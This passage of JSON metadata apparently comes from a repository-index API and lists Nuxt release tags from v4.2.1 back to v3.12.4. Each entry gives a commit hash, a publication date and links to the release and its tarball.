49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/t